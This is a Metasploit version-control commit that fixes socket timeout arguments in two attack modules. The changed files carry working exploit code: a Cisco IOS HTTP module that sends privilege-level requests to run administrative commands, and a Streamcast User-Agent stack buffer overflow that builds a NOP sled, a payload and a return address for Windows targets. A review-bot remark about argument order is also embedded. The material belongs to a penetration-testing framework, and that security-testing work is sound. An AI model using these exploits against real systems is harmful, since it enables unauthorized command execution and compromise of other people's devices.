Fix negative timeouts

git-svn-id: file:///home/svn/framework3/trunk@9048 4d416f70-5f16-0410-b530-b9f4589650da
HD Moore 2010-04-11 13:26:50 +00:00
parent a3e92b2e75
commit ee4528ed86
2 changed files with 17 additions and 16 deletions


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Cisco IOS HTTP Unauthorized Administrative Access',
'Description' => %q{
This module exploits a vulnerability in the Cisco IOS HTTP Server.
@ -44,7 +44,7 @@ class Metasploit3 < Msf::Auxiliary
Opt::RPORT(80),
OptString.new('CMD', [ true, "Cisco IOS command", 'show start' ])
], self.class)
end
def run
@ -56,7 +56,7 @@ class Metasploit3 < Msf::Auxiliary
sploit = "GET /level/" + level.to_s + "/exec/show%20privilege HTTP/1.0\r\n\r\n"
sock.put(sploit)
result = sock.get(-1,-3)
result = sock.get(-1, 3)
disconnect
if (result =~ /Current privilege level is/)
@ -69,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
sploit = "GET /level/" + level.to_s + "/exec/" + xCMD + " HTTP/1.0\r\n\r\n"
sock.put(sploit)
result = sock.get(-1,-3)
result = sock.get(-1, 3)
print_status(result.to_s)
disconnect
@ -77,7 +77,7 @@ class Metasploit3 < Msf::Auxiliary
end
end
end
end
@ -135,4 +135,5 @@ Example Exploit:
!
[snip]
=end
=end
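Review bot: The two `sock.get(-1, 3)` calls in `run` pass bare positional numbers with nothing at the call site saying which one is the timeout, and this commit exists because those values were wrong before (`-1,-3` here, and `3, -1` in the second file's `check`). A one-line comment above each call would keep the mix-up from returning, for example `# get(timeout, ltimeout): -1 = no overall limit, 3 = seconds to wait per read`. That wording assumes the Rex stream signature is `get(timeout, ltimeout)`, which this page does not show, so it should be confirmed against the definition. If the leading `-1` does mean "no overall limit", the comment should also say whether an unresponsive host can stall the module. `run` starts and ends outside the hunks shown.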


@ -3,7 +3,7 @@
##
##
# This file is part of the Metasploit Framework and may be subject to
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::Tcp
def initialize(info = {})
super(update_info(info,
super(update_info(info,
'Name' => 'Streamcast <= 0.9.75 HTTP User-Agent Buffer Overflow',
'Description' => %q{
This module exploits a stack overflow in Streamcast <= 0.9.75. By sending
@ -38,7 +38,7 @@ class Metasploit3 < Msf::Exploit::Remote
[ 'URL', 'http://aluigi.altervista.org/adv/steamcazz-adv.txt'],
# [ 'BID', '' ], # No entry as yet
],
'Privileged' => false,
'Privileged' => false,
'DefaultOptions' =>
{
'EXITFUNC' => 'thread',
@ -52,7 +52,7 @@ class Metasploit3 < Msf::Exploit::Remote
'DisableNops' => 'True',
},
'Platform' => 'win',
'Targets' =>
'Targets' =>
[
# Tested OK by patrick 20090225
[ 'Windows 2000 Pro English All', { 'Ret' => 0x75022ac4 } ],
@ -61,13 +61,13 @@ class Metasploit3 < Msf::Exploit::Remote
'DisclosureDate' => 'Jan 24 2008',
'DefaultTarget' => 1))
register_options([ Opt::RPORT(8000) ], self)
register_options([ Opt::RPORT(8000) ], self)
end
def check
connect
sock.put("GET / HTTP/1.0\r\n\r\n")
res = sock.get(3, -1)
res = sock.get(-1, 3)
disconnect
if (res =~ /Steamcast\/0.9.75/)
@ -80,9 +80,9 @@ class Metasploit3 < Msf::Exploit::Remote
connect
juju = "GET / HTTP/1.0\r\n"
juju << "User-Agent: " + make_nops(1008 - payload.encoded.length)
juju << payload.encoded + Rex::Arch::X86.jmp_short(6) + make_nops(2)
juju << [ target.ret ].pack('V') + [0xe8, -850].pack('CV')
juju << "User-Agent: " + make_nops(1008 - payload.encoded.length)
juju << payload.encoded + Rex::Arch::X86.jmp_short(6) + make_nops(2)
juju << [ target.ret ].pack('V') + [0xe8, -850].pack('CV')
juju << rand_text_alpha_upper(275)
print_status("Trying target #{target.name}...")